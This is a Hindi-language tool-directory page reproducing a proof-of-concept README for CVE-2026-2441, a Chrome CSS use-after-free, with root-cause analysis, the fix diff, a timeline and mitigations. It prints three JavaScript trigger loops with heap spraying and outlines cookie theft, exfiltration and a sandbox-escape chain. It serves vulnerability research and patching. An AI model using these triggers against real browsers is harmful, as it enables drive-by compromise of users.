Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-2441-PoC — CVE-2026-2441 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, एक Chrome CSS use-after-free जो सैंडबॉक्स्ड रेंडरर RCE की ओर ले जाता है। इसमें तीन ट्रिगर विधियाँ, हीप ग्रूमिंग और विस्तृत विश्लेषण शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/d3b0j33t/cve-2026-2441-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेपर और शोधलर्निंग और शिक्षा
GitHubd3b0j33t/cve-2026-2441-poc

CVE-2026-2441-PoC

CVE-2026-2441 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, एक Chrome CSS use-after-free जो सैंडबॉक्स्ड रेंडरर RCE की ओर ले जाता है। इसमें तीन ट्रिगर विधियाँ, हीप ग्रूमिंग और विस्तृत विश्लेषण शामिल हैं।

रिपॉजिटरी देखें
5 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-2441 — Chrome CSSFontFeatureValuesMap Use-After-Free

CVSS 8.8 (उच्च) | सक्रिय रूप से वाइल्ड में शोषित | Renderer RCE (सैंडबॉक्स्ड)

Google Chrome के Blink CSS इंजन में एक use-after-free भेद्यता जो एक दूरस्थ हमलावर को एक क्राफ्टेड HTML पेज के माध्यम से ब्राउज़र सैंडबॉक्स के अंदर मनमाना कोड निष्पादित करने की अनुमति देती है।

भेद्यता विवरण

फ़ील्डमान
CVECVE-2026-2441
CVSS8.8 (उच्च)
प्रकारUse-After-Free (CWE-416)
घटकBlink CSS — CSSFontFeatureValuesMap
स्रोत फ़ाइलthird_party/blink/renderer/core/css/css_font_feature_values_map.cc
फिक्स कमिट63f3cb4864c64c677cd60c76c8cb49d37d08319c
रिपोर्टरShaheen Fazim (2026-02-11)
पैच तिथि2026-02-13
वाइल्ड मेंहाँ — Google ने सक्रिय शोषण की पुष्टि की

प्रभावित संस्करण

प्लेटफ़ॉर्मअसुरक्षितफिक्स्ड
Windows / macOS (स्टेबल)< 145.0.7632.75>= 145.0.7632.75
Linux (स्टेबल)< 144.0.7559.75>= 144.0.7559.75
Windows / macOS (विस्तारित स्टेबल)< 144.0.7559.177>= 144.0.7559.177
Chromium-आधारित ब्राउज़र (Edge, Brave, Opera, Vivaldi)विक्रेता सलाह देखेंभिन्न होता है

मूल कारण

FontFeatureValuesMapIterationSource ने आंतरिक FontFeatureAliases HashMap के लिए एक रॉ पॉइंटर (const FontFeatureAliases* aliases_) संग्रहीत किया। जब इटरेशन के दौरान set() या delete() के माध्यम से मैप को म्यूट किया जाता है, तो HashMap रीहैश होता है — नया स्टोरेज आवंटित करता है और पुराने को मुक्त करता है। रॉ पॉइंटर डैंगलिंग हो जाता है, और अगला FetchNextItem() कॉल मुक्त मेमोरी से पढ़ता है।

असुरक्षित कोड पथ

root@kitploit:~
CreateIterationSource()
  → FontFeatureValuesMapIterationSource(map, aliases_)
  → aliases_ = आंतरिक HashMap के लिए रॉ पॉइंटर
  → iterator_ = aliases_->begin()

FetchNextItem()
  → iterator_->key पढ़ता है (aliases_ के माध्यम से)

यदि map.set() / map.delete() को इटरेशन के बीच कॉल किया जाता है:
  → HashMap रीहैश होता है (नया आवंटन, पुराना मुक्त)
  → aliases_ → डैंगलिंग पॉइंटर
  → iterator_ → अमान्य
  → अगला FetchNextItem() → USE-AFTER-FREE

फिक्स

root@kitploit:~
- const FontFeatureAliases* aliases_;   // रॉ पॉइंटर → रीहैश के बाद डैंगलिंग
+ const FontFeatureAliases aliases_;    // डीप कॉपी → रीहैश से प्रतिरक्षित

फिक्स रॉ पॉइंटर को HashMap की डीप कॉपी से बदल देता है। भले ही मूल मैप रीहैश हो जाए, इटरेटर अपनी स्वयं की कॉपी पर काम करता है, जिससे डैंगलिंग पॉइंटर रुक जाता है।

प्रूफ ऑफ कॉन्सेप्ट

उपयोग

  1. poc.html को असुरक्षित Chrome संस्करण (< 145.0.7632.75) में खोलें
  2. पेज तीन अलग-अलग तरीकों से UAF को ट्रिगर करने का प्रयास करेगा

अपेक्षित परिणाम

Chrome संस्करणअपेक्षित व्यवहार
< 145.0.7632.75 (अनपैच्ड)Renderer क्रैश — STATUS_ACCESS_VIOLATION (Windows) या SIGSEGV (Linux/macOS)। Chrome "Can't open this page" त्रुटि दिखाता है।
>= 145.0.7632.75 (पैच्ड)कोई क्रैश नहीं — PoC पूर्ण रूप से चलता है, सभी प्रविष्टियाँ सामान्य रूप से पढ़ी जाती हैं।

स्क्रीनशॉट (अनपैच्ड Chrome — क्रैश)

जब एक असुरक्षित Chrome संस्करण में खोला जाता है, तो renderer प्रक्रिया STATUS_ACCESS_VIOLATION के साथ क्रैश हो जाती है:

root@kitploit:~
Can't open this page

Error code: STATUS_ACCESS_VIOLATION

यह पुष्टि करता है कि UAF ट्रिगर हुआ है — डैंगलिंग पॉइंटर मुक्त/अनमैप्ड मेमोरी तक पहुँचता है, जिससे renderer प्रक्रिया समाप्त हो जाती है।

PoC कैसे काम करता है

PoC तीन स्वतंत्र तरीकों के माध्यम से UAF को ट्रिगर करता है:

विधि 1: entries() इटरेटर + म्यूटेशन लूप

root@kitploit:~
const iterator = map.entries();
while (step < 20) {
    iterator.next();          // (अब डैंगलिंग) पॉइंटर के माध्यम से पढ़ें
    map.delete(key);          // रीहैश ट्रिगर करें
    for (i = 0; i < 512; i++)
        map.set("spray_" + i, [i]);  // पुनः आवंटन को मजबूर करें
}

विधि 2: for...of + समवर्ती म्यूटेशन

root@kitploit:~
for (const [k, v] of map) {
    map.delete(k);
    for (i = 0; i < 512; i++)
        map.set("alt_" + i, [i]);
}

विधि 3: requestAnimationFrame + लेआउट पुनर्गणना

root@kitploit:~
function rafTrigger() {
    document.body.offsetWidth;   // लेआउट पुनर्गणना को मजबूर करें
    const result = iterator.next();
    map.delete(k);
    for (i = 0; i < 512; i++)
        map.set("raf_" + i, [i]);
    requestAnimationFrame(rafTrigger);
}

प्रत्येक विधि में हीप ग्रूमिंग भी शामिल है — संभावित शोषण के लिए हीप लेआउट को पूर्वानुमानित बनाने हेतु 50 समान आकार के @font-feature-values नियम आवंटित करना।

प्रभाव

तत्काल (सैंडबॉक्स-स्कोप्ड)

  • renderer प्रक्रिया सैंडबॉक्स के भीतर मनमाना कोड निष्पादन
  • सूचना प्रकटीकरण — V8 हीप पॉइंटर्स लीक करें (ASLR बाईपास), renderer मेमोरी सामग्री पढ़ें
  • क्रेडेंशियल चोरी — document.cookie, localStorage, sessionStorage, फ़ॉर्म इनपुट मान पढ़ें
  • सत्र अपहरण — सत्र टोकन चुराएं, fetch() / WebSocket / sendBeacon() के माध्यम से बाहर निकालें
  • DOM हेरफेर — फ़िशिंग फ़ॉर्म इंजेक्ट करें, पेज सामग्री संशोधित करें
  • कीलॉगिंग — addEventListener('keydown') के माध्यम से सभी कीस्ट्रोक्स कैप्चर करें

चेन्ड (सैंडबॉक्स एस्केप के साथ)

जब एक अलग सैंडबॉक्स एस्केप भेद्यता के साथ संयुक्त किया जाता है:

root@kitploit:~
Renderer RCE (CVE-2026-2441)
    → Mojo IPC शोषण → ब्राउज़र प्रक्रिया RCE
        → कर्नेल शोषण → पूर्ण सिस्टम समझौता
            → मैलवेयर / रैंसमवेयर / स्पाइवेयर स्थापना
            → फ़ाइल सिस्टम पहुँच, पार्श्व गति, स्थिरता

समान ब्राउज़र UAF का उपयोग करने वाली वास्तविक-विश्व शोषण श्रृंखलाएँ:

  • NSO Pegasus — WebKit UAF + सैंडबॉक्स एस्केप + कर्नेल शोषण
  • Intellexa Predator — Chrome UAF + Android कर्नेल शोषण
  • APT-28 (Fancy Bear) — Chrome 0-day + Windows LPE श्रृंखला

हमला वेक्टर

यह भेद्यता ड्राइव-बाय डाउनलोड के माध्यम से शोषणीय है — एक दुर्भावनापूर्ण पेज पर जाने के अलावा कोई उपयोगकर्ता इंटरैक्शन आवश्यक नहीं है:

  • मालवर्टाइज़िंग — वैध विज्ञापन नेटवर्क के माध्यम से परोसे गए दुर्भावनापूर्ण विज्ञापन
  • वॉटरिंग होल — लक्ष्य द्वारा अक्सर देखी जाने वाली साइट से समझौता करें
  • स्पीयर फ़िशिंग — ईमेल या मैसेजिंग के माध्यम से एक क्राफ्टेड लिंक भेजें

शमन

  1. Chrome को अपडेट करें >= 145.0.7632.75 (Windows/macOS) या >= 144.0.7559.75 (Linux)
  2. Chromium-आधारित ब्राउज़र अपडेट करें (Edge, Brave, Opera, Vivaldi) जब विक्रेता पैच उपलब्ध हों
  3. साइट आइसोलेशन सक्षम है सत्यापित करें (chrome://flags/#site-isolation-trial-opt-out)
  4. एंडपॉइंट्स की निगरानी करें फिक्स्ड बिल्ड से नीचे के Chrome संस्करणों के लिए

समयरेखा

तिथिघटना
2026-02-11Shaheen Fazim द्वारा भेद्यता की रिपोर्ट
2026-02-13Google Chrome 145.0.7632.75/76 (Windows/macOS), 144.0.7559.75 (Linux) जारी करता है
2026-02-13Google वाइल्ड में शोषण स्वीकार करता है
2026-02-16Vivaldi और Opera फिक्स जारी करते हैं

संदर्भ

  • Google Chrome Releases Blog
  • NVD — CVE-2026-2441
  • The Hacker News — Chrome Zero-Day Under Active Attack
  • Chromium Issue Tracker (प्रतिबंधित)

समर्थन

यदि आपको यह शोध उपयोगी लगता है, तो मुझे एक कॉफ़ी खरीदने पर विचार करें:

Buy Me A Coffee

अस्वीकरण

यह प्रूफ ऑफ कॉन्सेप्ट केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध इस PoC का उपयोग अवैध और अनैतिक है। लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं है।

लाइसेंस

MIT

टूल डाउनलोड करें